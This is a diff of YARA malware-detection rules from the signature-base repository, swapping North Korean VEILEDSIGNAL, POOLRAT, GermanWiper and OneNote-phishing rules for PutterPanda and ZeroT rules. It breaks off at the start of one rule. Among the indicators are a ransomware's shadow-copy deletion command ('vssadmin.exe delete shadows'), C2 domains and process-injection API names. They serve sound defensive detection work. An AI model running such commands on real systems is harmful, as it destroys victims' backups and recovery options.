-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L98-L118"
+		reference = "not set"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L110-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2a875c39a43ff054ed5a6cf2fa1f17c2adc189452582763db8ceddfa652abfbf"
+		logic_hash = "8054195f212017fb17953728a7df34645d81c93fee75300e44f467c6aa5efaff"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "404b09def6054a281b41d309d809a428"
-		hash2 = "c6441c961dcad0fe127514a918eaabd4"
+		super_rule = 1
+		hash0 = "bf1d385e637326a63c4d2f253dc211e6a5436b6a"
+		hash1 = "76459bcbe072f9c29bb9703bc72c7cd46a692796"
+		hash2 = "e105a7a3a011275002aec4b930c722e6a7ef52ad"
 
 	strings:
-		$sb1 = { FF 15 FC 76 01 00 8B F0 85 C0 74 ?? 8D 50 01 [6-16] FF 15 [4] 48 8B D8 48 85 C0 74 ?? 89 ?? 24 28 44 8B CD 4C 8B C? 48 89 44 24 20 }
-		$sb2 = { 33 D2 33 C9 FF 15 [4] 4C 8B CB 4C 89 74 24 28 4C 8D 05 [2] FF FF 44 89 74 24 20 33 D2 33 C9 FF 15 }
-		$si1 = "CreateThread" fullword
-		$si2 = "MultiByteToWideChar" fullword
-		$si3 = "LocalAlloc" fullword
-		$se1 = "DllGetClassObject" fullword
+		$s1 = "%s%duserid=%dthreadid=%dgroupid=%d" fullword ascii
+		$s2 = "ssdpsvc.dll" fullword ascii
+		$s3 = "Fail %s " fullword ascii
+		$s4 = "%s%dpara1=%dpara2=%dpara3=%d" fullword ascii
+		$s5 = "LsaServiceInit" fullword ascii
+		$s6 = "%-8d Fs %-12s Bs " fullword ascii
+		$s7 = "Microsoft DH SChannel Cryptographic Provider" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and 5 of them
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_5 : FILE
+rule SIGNATURE_BASE_Malware_Msupdater_String_In_EXE : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "7d0718fc-4f1c-5293-8dc4-81a5783fbfb2"
-		date = "2023-04-20"
+		description = "MSUpdater String in Executable"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c7da9e1e-3a8d-54b6-b102-0e1095d99cc4"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L120-L143"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L133-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d43b8198ad224bee8d290dd7031d73f76a7d957a2e3b44d89e7aaf5f2c94c65"
-		score = 75
+		hash = "b1a2043b7658af4d4c9395fa77fde18ccaf549bb"
+		logic_hash = "2b7a43aee6dbac1bfa7d9e0331cb078394ae78a1ec44c1a4a70a63b38595abe0"
+		score = 50
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "6727284586ecf528240be21bb6e97f88"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$sb1 = { 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D [3] 48 8B CB FF 15 [4] EB }
-		$ss1 = "chrome.exe" wide fullword
-		$ss2 = "firefox.exe" wide fullword
-		$ss3 = "msedge.exe" wide fullword
-		$ss4 = "\\\\.\\pipe\\*" ascii fullword
-		$ss5 = "FindFirstFileA" ascii fullword
-		$ss6 = "Process32FirstW" ascii fullword
-		$ss7 = "RtlAdjustPrivilege" ascii fullword
-		$ss8 = "GetCurrentProcess" ascii fullword
-		$ss9 = "NtWaitForSingleObject" ascii fullword
+		$x1 = "msupdate.exe" fullword wide
+		$x3 = "msupdater.exe" fullword ascii
+		$x4 = "msupdater32.exe" fullword ascii
+		$x5 = "msupdater32.exe" fullword wide
+		$x6 = "msupdate.pif" fullword ascii
+		$fp1 = "_msupdate_" wide
+		$fp2 = "_msupdate_" ascii
+		$fp3 = "/kies" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) ) and not ( 1 of ( $fp* ) )
 }
-rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_6 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_3 : FILE
 {
 	meta:
-		description = "Detects VEILEDSIGNAL malware"
-		author = "Mandiant"
-		id = "2cbedbc0-d465-5674-bf9c-9362003eb8d2"
-		date = "2023-04-20"
+		description = "Detects Malware related to PutterPanda - MSUpdater"
+		author = "Florian Roth (Nextron Systems)"
+		id = "917ab081-ee91-5eda-82eb-4731563a1933"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L145-L164"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L158-L175"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d3b1e5f7a6b73fc4cdc5abe19a412130cde33c2d52c0ad78256b865e018e3794"
-		score = 75
+		hash = "464149ff23f9c7f4ab2f5cadb76a4f41f969bed0"
+		logic_hash = "09e7da7f2bfbae9252502ea1ea61b612c1af2e4c70508b34e685b46429d4613c"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "00a43d64f9b5187a1e1f922b99b09b77"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ss1 = "C:\\Programdata\\" wide
-		$ss2 = "devobj.dll" wide fullword
-		$ss3 = "msvcr100.dll" wide fullword
-		$ss4 = "TpmVscMgrSvr.exe" wide fullword
-		$ss5 = "\\Microsoft\\Windows\\TPM" wide fullword
-		$ss6 = "CreateFileW" ascii fullword
+		$s0 = "msupdater.exe" fullword ascii
+		$s1 = "Explorer.exe \"" fullword ascii
+		$s2 = "FAVORITES.DAT" fullword ascii
+		$s4 = "COMSPEC" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule SIGNATURE_BASE_SUSP_NK_MAL_M_Hunting_POOLRAT
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_1 : FILE
 {
 	meta:
-		description = "Detects strings found in POOLRAT malware"
-		author = "Mandiant"
-		id = "70f5f3a0-0fd0-54dc-97cc-4f3c35f02fcd"
-		date = "2023-04-20"
+		description = "Detects Malware related to PutterPanda - MSUpdater"
+		author = "Florian Roth (Nextron Systems)"
+		id = "3c65b668-52c2-5cd5-ba02-4f190e08d46c"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		old_rule_name = "APT_NK_MAL_M_Hunting_POOLRAT"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L166-L202"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L177-L200"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "ac8db844a9c4ed961930417809afb706ea948c4509a4be1eaeed77f09c86069d"
+		hash = "b55072b67543f58c096571c841a560c53d72f01a"
+		logic_hash = "038be28609df0187cbbce0d16fee7c902b742458f1201ff3c0d5fde19acd2c56"
 		score = 70
-		quality = 83
-		tags = ""
-		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
-		hash1 = "451c23709ecd5a8461ad060f6346930c"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "name=\"uid\"%s%s%u%s" ascii wide
-		$s2 = "name=\"session\"%s%s%u%s" ascii wide
-		$s3 = "name=\"action\"%s%s%s%s" ascii wide
-		$s4 = "name=\"token\"%s%s%u%s" ascii wide
-		$str1 = "--N9dLfqxHNUUw8qaUPqggVTpX-" wide ascii nocase
+		$x0 = "msupdate.exe" fullword wide
+		$x1 = "msupdate" fullword wide
+		$s1 = "Microsoft Corporation. All rights reserved." fullword wide
+		$s2 = "Automatic Updates" fullword wide
+		$s3 = "VirtualProtectEx" fullword ascii
+		$s4 = "Invalid parameter" fullword ascii
+		$s5 = "VirtualAllocEx" fullword ascii
+		$s6 = "WriteProcessMemory" fullword ascii
 
 	condition:
-		any of ( $s* ) or $str1
+		( uint16( 0 ) == 0x5a4d and 1 of ( $x* ) and 4 of ( $s* ) ) or ( 1 of ( $x* ) and all of ( $s* ) )
 }
-rule SIGNATURE_BASE_APT_NK_Tradingtech_Forensicartifacts_Apr23_1 : FILE
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Msupdater_2 : FILE
 {
 	meta:
-		description = "Detects forensic artifacts, file names and keywords related the Trading Technologies compromise UNC4736"
-		author = "Florian Roth"
-		id = "f79a5321-4f22-52d9-aa83-4aa750ecc036"
-		date = "2023-04-20"
-		modified = "2023-04-21"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L204-L225"
+		description = "Detects Malware related to PutterPanda - MSUpdater"
+		author = "Florian Roth (Nextron Systems)"
+		id = "e9188a14-5c0c-551c-bdca-9f770f42935a"
+		date = "2015-06-03"
+		modified = "2023-12-05"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L202-L236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "50329427e56b70335a12f0dde87a36ac95838377482eebab334d252332fe481b"
-		score = 60
-		quality = 85
+		hash = "365b5537e3495f8ecfabe2597399b1f1226879b1"
+		logic_hash = "47d75e589d47a39d5a9c9e0047a143074d3d74b5541adf8cb3be968da732a96d"
+		score = 70
+		quality = 83
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$x1 = "www.tradingtechnologies.com/trading/order-management" ascii wide
-		$xf1 = "X_TRADER_r7.17.90p608.exe" ascii wide
-		$xf2 = "\\X_TRADER-ja.mst" ascii wide
-		$xf3 = "C:\\Programdata\\TPM\\TpmVscMgrSvr.exe" ascii wide
-		$xf4 = "C:\\Programdata\\TPM\\winscard.dll" ascii wide
-		$fp1 = "<html"
+		$s0 = "winsta0\\default" fullword ascii
+		$s1 = "EXPLORER.EXE" fullword ascii
+		$s2 = "WNetEnumResourceA" fullword ascii
+		$s3 = "explorer.exe" fullword ascii
+		$s4 = "CreateProcessAsUserA" fullword ascii
+		$s5 = "HttpSendRequestExA" fullword ascii
+		$s6 = "HttpEndRequestA" fullword ascii
+		$s7 = "GetModuleBaseNameA" fullword ascii
+		$s8 = "GetModuleFileNameExA" fullword ascii
+		$s9 = "HttpSendRequestA" fullword ascii
+		$s10 = "HttpOpenRequestA" fullword ascii
+		$s11 = "InternetConnectA" fullword ascii
+		$s12 = "Process32Next" fullword ascii
+		$s13 = "Process32First" fullword ascii
+		$s14 = "CreatePipe" fullword ascii
+		$s15 = "EnumProcesses" fullword ascii
+		$s16 = "LookupPrivilegeValueA" fullword ascii
+		$s17 = "PeekNamedPipe" fullword ascii
+		$s18 = "EnumProcessModules" fullword ascii
+		$s19 = "PSAPI.DLL" fullword ascii
+		$s20 = "SPSSSQ" fullword ascii
 
 	condition:
-		not uint16( 0 ) == 0x5025 and 1 of ( $x* ) and not 1 of ( $fp* )
+		uint16( 0 ) == 0x5a4d and filesize < 220KB and all of them
 }
-
-rule SIGNATURE_BASE_SUSP_TH_APT_UNC4736_Tradingtech_Cert_Apr23_1
+rule SIGNATURE_BASE_APT_Malware_Putterpanda_Gen4 : FILE
 {
 	meta:
-		description = "Threat hunting rule that detects samples signed with the compromised Trading Technologies certificate after May 2022"
-		author = "Florian Roth"
-		id = "9a05fba9-9466-5b69-9207-27ad01d6eb8b"
-		date = "2023-04-20"
+		description = "Detects Malware related to PutterPanda"
+		author = "Florian Roth (Nextron Systems)"
+		id = "0b6ce725-6932-5432-acd5-ee3593ac7bd8"
+		date = "2015-06-03"
 		modified = "2023-12-05"
-		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L227-L242"
+		reference = "VT Analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_putterpanda.yar#L238-L276"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47941828b3c18ed39eddacbc73e147651a9bd48e1a0f7b9847ff1d4c6fea6afd"
-		score = 65
+		logic_hash = "7d450935febe5d6db14be1e7694db1d7b9e8fcacf013920e89c7b25659254310"
+		score = 70
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "71a8378fa8e06bcf8ee9f019c807c6bfc58dca0c"
+		hash1 = "8fdd6e5ed9d69d560b6fdd5910f80e0914893552"
+		hash2 = "3c4a762175326b37035a9192a981f7f4cc2aa5f0"
+		hash3 = "598430b3a9b5576f03cc4aed6dc2cd8a43324e1e"
+		hash4 = "6522b81b38747f4aa09c98fdaedaed4b00b21689"
 
 	strings:
-		$s1 = { 00 85 38 A6 C5 01 8F 50 FC }
-		$s2 = "Go Daddy Secure Certificate Authority - G2"
-		$s3 = "Trading Technologies International, Inc"
+		$x1 = "rz.dat" fullword ascii
+		$s0 = "Mozilla/4.0 (Compatible; MSIE 6.0;)" fullword ascii
+		$s1 = "Internet connect error:%d" fullword ascii
+		$s2 = "Proxy-Authorization:Basic " fullword ascii
+		$s5 = "Invalid url" fullword ascii
+		$s6 = "Create file failed" fullword ascii
+		$s7 = "myAgent" fullword ascii
+		$z1 = "%s%s%d%d" fullword ascii
+		$z2 = "HttpQueryInfo failed:%d" fullword ascii
+		$z3 = "read file error:%d" fullword ascii
+		$z4 = "down file success" fullword ascii
+		$z5 = "kPStoreCreateInstance" fullword ascii
+		$z6 = "Avaliable data:%u bytes" fullword ascii
+		$z7 = "abe2869f-9b47-4cd9-a358-c22904dba7f7" fullword ascii
 
 	condition:
-		pe.timestamp> 1651363200 and all of them
+		filesize < 300KB and ( ( uint16( 0 ) == 0x5a4d and $x1 and 3 of ( $s* ) ) or ( 3 of ( $s* ) and 4 of ( $z* ) ) )
 }
-rule SIGNATURE_BASE_MAL_Ransomware_Germanwiper : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_1 : FILE
 {
 	meta:
-		description = "Detects RansomWare GermanWiper in Memory or in unpacked state"
-		author = "Frank Boldewin (@r3c0nst), modified by Florian Roth"
-		id = "e7587691-f69a-53e7-bab2-875179fbfa19"
-		date = "2019-08-05"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "c16f3abb-ac7e-5d5f-b8d7-b105cff3886e"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1158326526766657538"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_ransom_germanwiper.yar#L1-L27"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L11-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "dcb4f91006a893149a60e9708efb9de809f75c810bddfd2d90c8f6fffa0879ea"
+		logic_hash = "ad3018e6aa377b5032b04226ecb1e27b2cc7bc8294455ea51e426b5182ed7821"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash_packed = "41364427dee49bf544dcff61a6899b3b7e59852435e4107931e294079a42de7c"
-		hash_unpacked = "708967cad421bb2396017bdd10a42e6799da27e29264f4b5fb095c0e3503e447"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "09061c603a32ac99b664f7434febfc8c1f9fd7b6469be289bb130a635a6c47c0"
 
 	strings:
-		$x_Mutex1 = "HSDFSD-HFSD-3241-91E7-ASDGSDGHH" ascii
-		$x_Mutex2 = "cFgxTERNWEVhM2V" ascii
-		$PurgeCode = { 6a 00 8b 47 08 50 6a 00 6a 01 e8 ?? ?? ?? ??
-                     50 e8 ?? ?? ?? ?? 8b f0 8b d7 8b c3 e8 }
-		$ProcessKill1 = "sqbcoreservice.exe" ascii
-		$ProcessKill2 = "isqlplussvc.exe" ascii
-		$KillShadowCopies = "vssadmin.exe delete shadows" ascii
-		$Domain1 = "cdnjs.cloudflare.com" ascii
-		$Domain2 = "expandingdelegation.top" ascii
-		$RansomNote = "Entschluesselungs_Anleitung.html" ascii
+		$s1 = "suprise.exe" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_1 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_2 : FILE
 {
 	meta:
-		description = "Detects suspicious OneNote attachment that embeds suspicious payload, e.g. an executable (FPs possible if the PE is attached separately)"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "492b74c2-3b81-5dff-9244-8528565338c6"
-		date = "2023-01-27"
+		id = "8433216e-1189-568c-bd18-051fb1fec215"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L2-L39"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L26-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c7c5fc86f1dbe54da2d3ff8f039c5e53c3d1f67c9271cb467b2318310f744f93"
-		score = 65
+		logic_hash = "e31ade3690938fe0999423fbe446d9426e14abd01ebbada4eed8bddb1e2c9ea6"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "74eb592ef7f5967b14794acdc916686e061a43169f06e5be4dca70811b9815df"
 
 	strings:
-		$ge1 = "5xbjvWUmEUWkxI1NC3qer"
-		$ge2 = "cW471lJhFFpMSNTQt6nq"
-		$ge3 = "nFuO9ZSYRRaTEjU0Lep6s"
-		$sp1 = "VGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZG"
-		$sp2 = "RoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2Rl"
-		$sp3 = "UaGlzIHByb2dyYW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZ"
-		$sp4 = "VGhpcyBwcm9ncmFtIG11c3QgYmUgcnVuIHVuZGVy"
-		$sp5 = "RoaXMgcHJvZ3JhbSBtdXN0IGJlIHJ1biB1bmRlc"
-		$sp6 = "UaGlzIHByb2dyYW0gbXVzdCBiZSBydW4gdW5kZX"
-		$se1 = "QGVjaG8gb2Zm"
-		$se2 = "BlY2hvIG9mZ"
-		$se3 = "AZWNobyBvZm"
-		$se4 = "PEhUQTpBUFBMSUNBVElPTi"
-		$se5 = "xIVEE6QVBQTElDQVRJT04g"
-		$se6 = "8SFRBOkFQUExJQ0FUSU9OI"
-		$se7 = "TAAAAAEUAg"
-		$se8 = "wAAAABFAIA"
-		$se9 = "MAAAAARQCA"
+		$s1 = "NO2-2016101902.exe" fullword ascii
 
 	condition:
-		filesize < 5MB and 1 of ( $ge* ) and 1 of ( $s* )
+		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Email_Suspicious_Onenote_Attachment_Jan23_2 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_3 : FILE
 {
 	meta:
-		description = "Detects suspicious OneNote attachment that has a file name often used in phishing attacks"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f8c58c73-2404-5ce6-8e8f-99b0dad84ad0"
-		date = "2023-01-27"
+		id = "99aa29cf-d962-5a3d-bd28-6486c40822bb"
+		date = "2017-02-03"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L41-L61"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L41-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "eb6f992ce186022f04613af3bf4df629b00d85eac151f8bbd4b8ef96e6892eab"
-		score = 65
+		logic_hash = "6920febf177667610e3edb8ba88ec137d085a867c1d6a570d4785fcc9cc62d49"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "ee2e2937128dac91a11e9bf55babc1a8387eb16cebe676142c885b2fc18669b2"
 
 	strings:
-		$hc1 = { 2E 6F 6E 65 22 0D 0A 0D 0A 35 46 4A 63 65 }
-		$x01 = " attachment; filename=\"Invoice" nocase
-		$x02 = " attachment; filename=\"ORDER" nocase
-		$x03 = " attachment; filename=\"PURCHASE" nocase
-		$x04 = " attachment; filename=\"SHIP" nocase
+		$s1 = "/svchost.exe" fullword ascii
+		$s2 = "RasTls.dll" fullword ascii
+		$s3 = "20160620.htm" fullword ascii
+		$s4 = "* $l&$" fullword ascii
+		$s5 = "dfjhmh" fullword ascii
+		$s6 = "/20160620.htm" fullword ascii
 
 	condition:
-		filesize < 5MB and $hc1 and 1 of ( $x* )
+		( uint16( 0 ) == 0x5449 and filesize < 1000KB and 3 of them ) or ( all of them )
 }
-rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_1 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_4 : FILE
 {
 	meta:
-		description = "Detects suspicious embedded file types in OneNote files"
-		author = "Florian Roth"
-		id = "b8ea8c7b-052f-5a97-9577-99903462ea84"
-		date = "2023-01-27"
-		modified = "2023-02-27"
-		reference = "https://blog.didierstevens.com/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_onenote_phish.yar#L63-L106"
+		description = "Detects malware from the Proofpoint CN APT ZeroT incident"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b21961ee-d346-51d3-bacd-02554240162d"
+		date = "2017-02-03"
+		modified = "2023-12-05"
+		reference = "https://www.proofpoint.com/us/threat-insight/post/APT-targets-russia-belarus-zerot-plugx"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_cn_pp_zerot.yar#L61-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d91ca297ea96f80534085f174d335ffe961c569534f043c5c2ae8d6a9f7ac083"
-		score = 65
+		logic_hash = "8011497e7d061a9ebde06667e47b5cd9469a433e0be1401d70637e7ace8e8155"
+		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a9519d2624a842d2c9060b64bb78ee1c400fea9e43d4436371a67cbf90e611b8"
 
 	strings:
-		$x1 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? 4d 5a }
-		$x2 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 40 65 63 68 6f }
-		$x3 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 40 45 43 48 4f }
-		$x4 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 4F 6E 20 45 }
-		$x5 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [0-4] 6F 6E 20 65 }
-		$x6 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? 4c 00 00 00 }
-		$x7 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? 49 54 53 46 }
-		$x8 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [6-200] 3C 68 74 61 3A }
-		$x9 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [6-200] 3C 48 54 41 3A }
-		$x10 = { e7 16 e3 bd 65 26 11 45 a4 c4 8d 4d 0b 7a 9e ac
-              ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ??
-              ?? ?? ?? ?? [6-200] 3C 6A 6F 62 20 }
+		$s1 = "Mcutil.dll" fullword ascii
+		$s2 = "mcut.exe" fullword ascii
 
 	condition:
-		filesize < 10MB and 1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them )
 }
-rule SIGNATURE_BASE_SUSP_Onenote_Embedded_Filedatastoreobject_Type_Jan23_2 : FILE
+rule SIGNATURE_BASE_PP_CN_APT_Zerot_5 : FILE
 {
 	meta:
